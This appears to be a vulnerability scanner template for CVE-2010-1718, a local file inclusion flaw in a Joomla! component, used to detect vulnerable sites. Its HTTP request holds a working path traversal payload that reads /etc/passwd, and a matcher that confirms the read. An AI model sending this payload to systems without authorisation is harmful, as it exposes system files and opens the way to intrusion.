id: CVE-2010-1718 info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. remediation: | Update to the latest version of Joomla! Component Archery Scores or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/12282 - https://nvd.nist.gov/vuln/detail/CVE-2010-1718 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 epss-percentile: 0.8192 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lispeltuut product: com_archeryscores tags: cve,cve2010,joomla,lfi,edb,lispeltuut http: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a0046304402201dc083bb694abd37e88974641d425a4eaf4eff49cd1a761d702b381aaf4996200220164ea38314a22108dcab83b2524a8f02609d718d0f5541633d753c2dc66ea34c:922c64590222798bb761d5b6d8e72950